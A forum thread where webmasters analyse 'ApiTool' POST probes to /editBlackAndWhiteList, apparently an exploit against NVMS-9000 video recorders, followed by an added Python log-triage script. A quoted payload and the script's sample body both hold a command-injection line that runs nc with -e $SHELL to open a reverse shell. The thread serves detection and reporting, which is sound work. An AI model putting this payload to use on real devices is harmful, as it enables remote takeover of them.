
ApiTool

         

Pfui

7:23 am on Oct 7, 2019 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



UA: ApiTool
URI: /editBlackAndWhiteList
Request Method: POST
ISPs: Mexico: axtel.net; San Jose, CA: spectrum.com

Info: Loads of "API Tool"-related search results so "ApiTool" could be anything from an exploit to a blooper -- but POST and the URI suggest exploit. No clue about the URI either, sorry. First seen yesterday and only twice.

honeyandpot

10:19 pm on Oct 24, 2019 (gmt 0)

5+ Year Member



Exploit, looking for NVMS-9000-series no-name PVR-type network-attached devices. The payload contains the following shellcode in an attempt to gain a root shell on the device (${IFS} replaced with spaces for clarity).
<ip>$(nc xx.xxx.xx.xxx 31337 -e $SHELL&)</ip>

The IP address in the shellcode is usually different from the originating IP, suggesting there's more than a rookie script kiddie behind this.

[edited by: engine at 11:27 am (utc) on Oct 26, 2019]
[edit reason] obfuscated ip [/edit]

tangor

11:51 pm on Oct 24, 2019 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



@honeyandpot (kewl moniker!) Welcome to Webmasterworld!

The bad actors are everywhere and we need to stay alert!

Pfui

5:52 am on Oct 26, 2019 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Thanks for confirmation and info, and welcome, honeyandpot! I'm seeing this exploit three to four times a day now, always the exact same UA/URI/Request Method. A sprinkling of US IPs but most are elsewhere.

lucy24

4:37 pm on Oct 26, 2019 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I'm seeing this exploit three to four times a day now
Every time I read about a robot that I've never set eyes on, I get to wondering what triggers its arrival. Obviously not something basic like the presence of some standard CMS, since that kind of thing gets requested regardless. (Business with search engine tells me that around 1/3 of all websites [w3techs.com] use WP--though it certainly doesn't follow that 1/3 of all web traffic is to WP pages.)

Cursory research suggests that it really is a new robot, since everything with a visible date is from this month. (Cursory research also reveals that a heck of a lot of people's access logs somehow ended up in crawlable and hence indexable locations, suggesting a major ineptitude on the part of one or more hosts.) It doesn't look as if the URL is associated with any well-known CMS, so where are they getting it from? With different casing, it's the contact address for at least one British newspaper, but that's probably a red herring unless something sneaked into a script by mistake.

tangor

4:12 am on Oct 27, 2019 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Heh ... api can also be bogus "application program interface". (wink wink nudge nudge)

honeyandpot

2:26 am on Nov 17, 2019 (gmt 0)

5+ Year Member



Last week I got curious enough to set up a bit of a logger and a 'reverse honeypot', with my script trying to connect to the service, pretending to be a 'compromised router'. And sure, curiosity killed... only a bit of time and effort that could probably have been spent more productively.

To my surprise, all those requests, although coming from all around the globe, refer to just a couple of IP addresses: one in the Seychelles (of course that one rather exotic location was the main cause of my curiosity) and the other one in Cheyenne, WY. Not publishing IPs here, seems they get stripped anyway. And the main thing: none of the IPs has ever responded. Apparently the whole thing is some kind of packaged solution, like a multiple-vulnerability scanner that people just don't bother setting up properly and run with mostly default configuration.
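An added triage helper, written for this page and not code posted by anyone in the thread. It covers two posts above: honeyandpot's description of the payload (a command substitution inside the `<ip>` element, with `${IFS}` standing in for spaces, that runs `nc ... -e $SHELL` back to a handler), and the later 'logger' post, where the useful output is a tally of callback addresses across many originating IPs. Everything below is assumed or constructed: the access-log lines, the request body (only the `<ip>` element is attested on the page, so no other XML is invented around it), the addresses (192.0.2.10, 198.51.100.x, 203.0.113.x are documentation ranges standing in for the obfuscated ones), and the list of nc options that take an argument.

```python
"""Added triage helper for the ApiTool / editBlackAndWhiteList probes.

Not from the thread. Sample log lines and the POST body are constructed;
192.0.2.10, 198.51.100.x and 203.0.113.x are documentation addresses.
"""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constructed body, modelled on the one quoted above: a command substitution
# in the <ip> element, with ${IFS} (the shell's field separator) where a space
# would be. Only the <ip> element is attested, so nothing is wrapped around it.
SAMPLE_BODY = "<ip>$(nc${IFS}192.0.2.10${IFS}31337${IFS}-e${IFS}$SHELL&)</ip>"

# Constructed combined-format access log lines: two probes, one benign hit.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Oct/2019:07:23:00 +0000] "POST /editBlackAndWhiteList HTTP/1.1" 404 196 "-" "ApiTool"',
    '198.51.100.23 - - [24/Oct/2019:22:19:00 +0000] "POST /editBlackAndWhiteList HTTP/1.1" 404 196 "-" "ApiTool"',
    '198.51.100.9 - - [24/Oct/2019:22:20:00 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
IP_ELEMENT_RE = re.compile(r"<ip>(.*?)</ip>", re.S)
IFS_RE = re.compile(r"\$\{IFS\}|\$IFS\b")
SUBST_RE = re.compile(r"\$\((.*?)\)|`(.*?)`", re.S)   # $(...) or backticks
NC_NAMES = ("nc", "ncat", "netcat")
NC_OPTS_WITH_ARG = {"-e", "-c", "-p", "-w", "-s", "-i"}  # assumed option set


def normalize_ifs(s: str) -> str:
    """Turn ${IFS}/$IFS back into spaces so the command reads as typed."""
    return IFS_RE.sub(" ", s)


def extract_injected_command(body: str) -> Optional[str]:
    """Return the command hidden in an <ip> element, or None when the element
    holds a plain value (a real list edit, or a probe carrying no payload)."""
    for m in IP_ELEMENT_RE.finditer(body):
        value = normalize_ifs(m.group(1))
        sub = SUBST_RE.search(value)
        if sub:
            cmd = sub.group(1) if sub.group(1) is not None else sub.group(2)
            return cmd.strip().rstrip("&").strip()  # drop the backgrounding '&'
    return None


def parse_nc_callback(cmd: str) -> Optional[Tuple[str, int]]:
    """Recover the host:port an nc reverse shell dials out to. Walks the tokens
    after nc, skipping options (and the argument of -e/-c/...) so the first
    two positional tokens are host and port wherever the options sit."""
    toks = cmd.split()
    try:
        start = next(i for i, t in enumerate(toks) if t in NC_NAMES)
    except StopIteration:
        return None
    positional: List[str] = []
    skip = False
    for t in toks[start + 1:]:
        if skip:
            skip = False
            continue
        if t.startswith("-"):
            skip = t in NC_OPTS_WITH_ARG
            continue
        positional.append(t)
    if len(positional) < 2 or not positional[1].isdigit():
        return None
    port = int(positional[1])
    if not 0 < port < 65536:
        return None
    return positional[0], port


def match_probe(line: str) -> Optional[Dict[str, object]]:
    """Flag a POST to /editBlackAndWhiteList in a combined-format log line.
    Method and URI are the stable part; the UA is recorded but not required,
    since a scanner can change it."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    if m["uri"].split("?")[0].lower() != "/editblackandwhitelist":
        return None
    rec: Dict[str, object] = dict(m.groupdict())
    rec["ua_is_apitool"] = rec["ua"] == "ApiTool"
    return rec


def triage(line: str, body: str) -> Optional[Dict[str, object]]:
    """Join the log line with the captured body (a honeypot logger has both):
    the origin IP on one side, the reverse-shell handler on the other."""
    rec = match_probe(line)
    if rec is None:
        return None
    cmd = extract_injected_command(body)
    rec["command"] = cmd
    rec["callback"] = parse_nc_callback(cmd) if cmd else None
    return rec


def tally_callbacks(records) -> Counter:
    """Count handler endpoints across probes: many origins funnelling into a
    couple of callback addresses is the pattern described above."""
    return Counter(r["callback"] for r in records if r and r["callback"])


if __name__ == "__main__":
    recs = [triage(line, SAMPLE_BODY) for line in SAMPLE_LOG]
    for r in recs:
        if r:
            print(r["host"], r["ua"], "->", r["callback"])
    print(dict(tally_callbacks(recs)))
```

Keyed on the callback rather than the requesting IP, the tally separates the scanner's disposable origins from the handler the payload actually phones home to; a web server that is not an NVR will answer these POSTs with a 404 and nothing else happens, but the callback address is still the one worth reporting.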